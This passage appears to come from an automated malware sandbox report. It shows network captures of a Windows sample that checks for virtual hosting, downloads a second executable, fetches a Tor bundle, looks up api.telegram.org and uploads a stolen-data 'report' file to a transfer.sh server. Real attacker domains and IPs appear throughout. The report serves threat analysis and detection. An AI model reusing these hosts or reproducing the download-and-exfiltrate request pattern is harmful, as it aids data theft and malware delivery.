                                                                          Jul 23, 2024 15:47:21.336393118 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.336407900 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.336424112 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.336443901 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.336445093 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.336473942 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.341267109 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388786077 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388835907 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388851881 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388892889 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388907909 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388922930 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388938904 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388943911 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.388953924 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.388981104 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389010906 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389024973 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389025927 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389043093 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389058113 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389060974 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389072895 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389094114 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389117956 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389286995 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389348984 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389367104 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389393091 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389432907 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389448881 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389465094 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389473915 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389481068 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389497042 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389506102 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389549017 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389563084 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389580011 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389590025 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389595032 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389615059 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389642000 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389662027 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389688969 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389712095 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389730930 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389731884 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389746904 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389763117 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389775038 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389780998 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389808893 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389818907 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389833927 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389852047 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389868975 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389875889 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389883995 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389899015 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389924049 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.389942884 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389966965 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389982939 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.389997959 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390013933 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390023947 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.390028954 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390052080 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.390060902 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390069008 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.390119076 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390136957 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390170097 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390177965 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.390187979 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390211105 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.390212059 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390228033 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.390253067 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393083096 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393100023 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393115044 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393158913 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393177986 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393193960 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393205881 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393220901 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393237114 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393264055 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393301010 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393326998 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393881083 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393913031 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393929005 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393935919 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393944025 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393959045 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393975019 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.393987894 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.393990993 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394005060 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394018888 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394035101 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394594908 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394608974 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394655943 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394718885 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394733906 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394761086 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394773960 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394788980 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394804001 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394813061 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.394819975 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.394860029 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.395942926 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.395987034 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396051884 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396065950 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396081924 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396097898 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396114111 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396116972 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396136045 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396142960 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396167040 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396176100 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396183014 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396198034 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396214008 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396219015 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396259069 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396277905 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396294117 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396308899 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396330118 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396358967 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.396395922 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.396471024 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398478985 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398494959 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398520947 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398554087 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398559093 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398572922 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398583889 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398607016 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398617029 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398622990 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398638964 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398662090 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398690939 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398706913 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398720980 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398730040 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398736000 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398750067 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398760080 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.398766041 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.398787975 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.399962902 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.399988890 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400005102 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400008917 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.400022984 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400063038 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.400068998 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400084972 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400110006 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.400124073 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.400163889 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.406907082 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.406934977 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.406951904 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.406996012 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407006025 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.407011986 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407027006 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.407032967 CEST497299001192.168.2.5193.142.146.239
                                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                          Jul 23, 2024 15:46:38.585251093 CEST | 192.168.2.5 | 1.1.1.1 | 0xbe7b | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:46:46.486669064 CEST | 192.168.2.5 | 1.1.1.1 | 0x254e | Standard query (0) | securefirewall.portmap.io | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:46:50.181355000 CEST | 192.168.2.5 | 1.1.1.1 | 0x617e | Standard query (0) | libyaalahrar.co | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:01.958019018 CEST | 192.168.2.5 | 1.1.1.1 | 0x460d | Standard query (0) | github.com | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:03.067922115 CEST | 192.168.2.5 | 1.1.1.1 | 0x333 | Standard query (0) | objects.githubusercontent.com | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:12.615854025 CEST | 192.168.2.5 | 1.1.1.1 | 0x5432 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:15.448431015 CEST | 192.168.2.5 | 1.1.1.1 | 0x2788 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                          Jul 23, 2024 15:46:38.593274117 CEST | 1.1.1.1 | 192.168.2.5 | 0xbe7b | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:46:47.429620981 CEST | 1.1.1.1 | 192.168.2.5 | 0x254e | No error (0) | securefirewall.portmap.io | | 193.161.193.99 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:46:50.203350067 CEST | 1.1.1.1 | 192.168.2.5 | 0x617e | No error (0) | libyaalahrar.co | | 199.188.200.89 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:01.966474056 CEST | 1.1.1.1 | 192.168.2.5 | 0x460d | No error (0) | github.com | | 140.82.121.3 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST | 1.1.1.1 | 192.168.2.5 | 0x333 | No error (0) | objects.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST | 1.1.1.1 | 192.168.2.5 | 0x333 | No error (0) | objects.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST | 1.1.1.1 | 192.168.2.5 | 0x333 | No error (0) | objects.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:03.079933882 CEST | 1.1.1.1 | 192.168.2.5 | 0x333 | No error (0) | objects.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:13.550637007 CEST | 1.1.1.1 | 192.168.2.5 | 0x5432 | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                                                                          Jul 23, 2024 15:47:15.456033945 CEST | 1.1.1.1 | 192.168.2.5 | 0x2788 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          0 | 192.168.2.5 | 49706 | 208.95.112.1 | 80 | 2672 | C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jul 23, 2024 15:46:38.608838081 CEST | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Jul 23, 2024 15:46:39.096231937 CEST | 175 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 23 Jul 2024 13:46:38 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 6
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 60
                                                                          X-Rl: 44
                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                          Data Ascii: false


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          1 | 192.168.2.5 | 49724 | 208.95.112.1 | 80 | 5624 | C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jul 23, 2024 15:47:13.583383083 CEST | 85 | OUT | GET /line?fields=query,country HTTP/1.1
                                                                          Host: ip-api.com
                                                                          Connection: Keep-Alive
                                                                          Jul 23, 2024 15:47:14.046308994 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 23 Jul 2024 13:47:12 GMT
                                                                          Content-Type: text/plain; charset=utf-8
                                                                          Content-Length: 26
                                                                          Access-Control-Allow-Origin: *
                                                                          X-Ttl: 25
                                                                          X-Rl: 43
                                                                          Data Raw: 55 6e 69 74 65 64 20 53 74 61 74 65 73 0a 38 2e 34 36 2e 31 32 33 2e 33 33 0a
                                                                          Data Ascii: United States8.46.123.33


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.5 | 49726 | 185.119.118.59 | 8080 | 5624 | C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Jul 23, 2024 15:47:14.458898067 CEST | 203 | OUT | PUT /%69%41%41%44%39%5F%61%6C%66%6F%6E%73%40%31%32%38%37%35%37%5F%72%65%70%6F%72%74.%77%73%72 HTTP/1.1
                                                                          Host: 185.119.118.59:8080
                                                                          Content-Length: 147922
                                                                          Expect: 100-continue
                                                                          Connection: Keep-Alive
                                                                          Jul 23, 2024 15:47:15.131804943 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                          Jul 23, 2024 15:47:15.446748972 CEST | 384 | IN | HTTP/1.1 200 OK
                                                                          Content-Type: text/plain
                                                                          Server: Transfer.sh HTTP Server
                                                                          X-Made-With: <3 by DutchCoders
                                                                          X-Served-By: Proudly served by DutchCoders
                                                                          X-Url-Delete: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user@128757_report.wsr/GSkGoa0ALqi06WR6S2ub
                                                                          Date: Tue, 23 Jul 2024 13:47:15 GMT
                                                                          Content-Length: 68
                                                                          Data Raw: 68 74 74 70 3a 2f 2f 31 38 35 2e 31 31 39 2e 31 31 38 2e 35 39 3a 38 30 38 30 2f 64 30 4f 75 61 71 69 7a 66 7a 2f 69 41 41 44 39 5f 61 6c 66 6f 6e 73 40 31 32 38 37 35 37 5f 72 65 70 6f 72 74 2e 77 73 72
                                                                          Data Ascii: http://185.119.118.59:8080/d0Ouaqizfz/iAAD9_user@128757_report.wsr


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          0 | 192.168.2.5 | 49708 | 199.188.200.89 | 443 | 2672 | C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-07-23 13:46:51 UTC | 95 | OUT | GET /uploaded/JxTcJM84e3NbGP4mm.exe HTTP/1.1
                                                                          Host: libyaalahrar.co
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:46:51 UTC | 289 | IN | HTTP/1.1 200 OK
                                                                          keep-alive: timeout=5, max=100
                                                                          content-type: application/x-msdownload
                                                                          last-modified: Mon, 22 Jul 2024 19:05:06 GMT
                                                                          accept-ranges: bytes
                                                                          content-length: 511496
                                                                          date: Tue, 23 Jul 2024 13:46:51 GMT
                                                                          server: LiteSpeed
                                                                          x-turbo-charged-by: LiteSpeed
                                                                          connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          1 | 192.168.2.5 | 49718 | 140.82.121.3 | 443 | 5624 | C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-07-23 13:47:02 UTC | 132 | OUT | GET /matinrco/tor/releases/download/v0.4.5.10/tor-expert-bundle-v0.4.5.10.zip HTTP/1.1
                                                                          Host: github.com
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:47:03 UTC | 1016 | IN | HTTP/1.1 302 Found
                                                                          Server: GitHub.com
                                                                          Date: Tue, 23 Jul 2024 13:47:02 GMT
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                          Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream
                                                                          Cache-Control: no-cache
                                                                          Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                          X-Frame-Options: deny
                                                                          X-Content-Type-Options: nosniff
                                                                          X-XSS-Protection: 0
                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                          2024-07-23 13:47:03 UTC | 3086 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e
                                                                          Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
                                                                          2024-07-23 13:47:03 UTC | 21 | IN | Data Raw: 63 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a
                                                                          Data Ascii: connection: close


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          2 | 192.168.2.5 | 49719 | 185.199.108.133 | 443 | 5624 | C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          2024-07-23 13:47:03 UTC | 607 | OUT | GET /github-production-release-asset-2e65be/146779096/943f13f9-3eb9-4042-8722-d95f026c8b09?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240723%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240723T134702Z&X-Amz-Expires=300&X-Amz-Signature=684cb43c3b728dcd5e6fa405bf9e25ff74f8774c26110905339a58889403f8fe&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=146779096&response-content-disposition=attachment%3B%20filename%3Dtor-expert-bundle-v0.4.5.10.zip&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                          Host: objects.githubusercontent.com
                                                                          Connection: Keep-Alive
                                                                          2024-07-23 13:47:03 UTC | 835 | IN | HTTP/1.1 200 OK
                                                                          Connection: close
                                                                          Content-Length: 6710958
                                                                          Content-Type: application/octet-stream
                                                                          Content-MD5: 9OeRN6tLfAr39BD4dWG/Iw==
                                                                          Last-Modified: Thu, 27 Jan 2022 16:21:05 GMT
                                                                          ETag: "0x8D9E1B104D9C2C4"
                                                                          Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                          x-ms-request-id: cb0134c4-b01e-0062-6136-dc2372000000
                                                                          x-ms-version: 2020-10-02
                                                                          x-ms-creation-time: Thu, 27 Jan 2022 16:21:05 GMT
                                                                          x-ms-lease-status: unlocked
                                                                          x-ms-lease-state: available
                                                                          x-ms-blob-type: BlockBlob
                                                                          Content-Disposition: attachment; filename=tor-expert-bundle-v0.4.5.10.zip
                                                                          x-ms-server-encrypted: true
                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                          Accept-Ranges: bytes
                                                                          Age: 0
